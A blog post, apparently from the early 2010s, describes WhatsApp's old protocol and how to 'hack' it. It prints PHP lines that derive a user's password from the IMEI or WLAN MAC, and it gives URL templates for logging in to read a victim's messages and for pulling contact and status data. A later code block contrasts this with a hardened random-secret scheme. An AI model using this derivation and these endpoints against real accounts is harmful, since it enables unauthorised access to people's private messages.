
How to Hack WhatsApp Messenger | Build WhatsApp API Client

Desktop IMs have long been our favorite mode of communication, but with time their significance has definitely come down.
With smartphones taking up a large part of our daily lives, IM services like WhatsApp, iMessage, BBM, etc. have emerged and exchange more messages every second. WhatsApp delivers more than 1 billion messages per day, and yet it is the most insecure way of communicating.

As per a recent security analysis, WhatsApp is a totally insecure way of communicating with friends.

WhatsApp Encryption

You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. That means that if you were using WhatsApp on public Wi-Fi, everything could be captured by anyone else sniffing on the wireless network. The latest WhatsApp uses encryption, but this new encryption is broken, and the phone number is still sent out in plaintext.
The local storage isn't any different; you can check out the WhatsApp Database Encryption Project Report.

WhatsApp API & Reverse Engineering

If you know XMPP, the same protocol used by Facebook, GTalk and several others, you can try your hand at WhatsAPI, an API for WhatsApp messenger.
WhatsApp uses a customized XMPP server with proprietary extensions, named internally FunXMPP.

1. WhatsApp Authentication / Login Mechanism

Just like any other XMPP service, WhatsApp uses a Jabber ID (JID) and password to log in. The password is hashed, stored on the servers upon account creation, and used transparently every time the client connects to the server.

It's an incredibly horrible implementation. As researchers found out, the username is the user's phone number, which an attacker probably already knows.
On Android, the password is an MD5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS, the password is generated from the device's WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
Both the IMEI and the MAC address are easily retrievable from a device if you have physical access to it. The MAC address is much easier to capture, as you can sniff the wireless network to which the iOS device is connected.
The JID is a concatenation of your country code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the user's phone number (without the country calling code)
$password = see above; for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei))
The response you receive is XML containing the messages destined for your phone.
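
The weakness in this section is that the credential is a pure function of a device identifier that is not secret. As an added example (not code from the original post or from WhatsApp), the sketch below puts the derivation from the post beside a server-issued random secret; the function names, the in-memory $store and the sample JID are assumptions made for illustration.

```php
<?php
// Added example: device-derived passwords vs. a server-issued random secret.
// Function names and the in-memory $store are hypothetical.

// Scheme described in the post: the password is a pure function of an identifier.
function legacyAndroidPassword(string $imei): string {
    return md5(strrev($imei));
}
function legacyIosPassword(string $wlanMac): string {
    return md5($wlanMac . $wlanMac);
}

// Hardened registration: the server draws 256 bits from a CSPRNG, hands the
// secret to the client once, and keeps only a hash of it. A fast hash is
// acceptable here because the input is high-entropy, unlike a human password.
function registerAccount(array &$store, string $jid): string {
    $secret = bin2hex(random_bytes(32));
    $store[$jid] = hash('sha256', $secret);
    return $secret; // the client keeps this in platform secure storage
}

// Verification compares hashes in constant time.
function verifyLogin(array $store, string $jid, string $presented): bool {
    if (!isset($store[$jid])) {
        return false;
    }
    return hash_equals($store[$jid], hash('sha256', $presented));
}

$imei = "112222223333334";   // example IMEI from the post
$mac  = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC from the post
$jid  = "15550100000";       // constructed JID (country code + number)

// The legacy value never changes for a given device, so it cannot be rotated.
var_dump(legacyAndroidPassword($imei) === legacyAndroidPassword($imei));

$store = [];
$secretA = registerAccount($store, $jid);
var_dump(verifyLogin($store, $jid, $secretA));                     // issued secret
var_dump(verifyLogin($store, $jid, legacyAndroidPassword($imei))); // device-derived
var_dump(verifyLogin($store, $jid, legacyIosPassword($mac)));      // device-derived

// Registering again rotates the credential; check the old secret once more.
$secretB = registerAccount($store, $jid);
var_dump($secretA !== $secretB);
var_dump(verifyLogin($store, $jid, $secretA));
```

With the random secret, knowing the phone number, IMEI or MAC address gives no information about the credential, and a compromised secret can be replaced without changing the device.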

2. Text Message communication

Messages are basically sent as TCP packets, following WhatsApp's own format (unlike what's defined in the XMPP RFCs).
Photos, videos and audio files shared with WhatsApp contacts are uploaded over HTTP to a server before being sent to the recipient(s); the message body carries the generated HTTP link, along with a Base64 thumbnail of the media file (if applicable).

WhatsApp Privacy Leak

WhatsApp shares your contacts with the server; we all know that. But the way it is done is ridiculously insecure. It basically sends the contact information as:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
Key “P” is the user's phone number, key “T” seems to be the uptime(?), key “S” is the user's status message. Not sure about “JID” and “NP” yet – if you have a smart guess, let me know. All this information is public.

Author: Anonymous

24 comments:

  1. What could be whatsapp password when I am using it from an android tablet
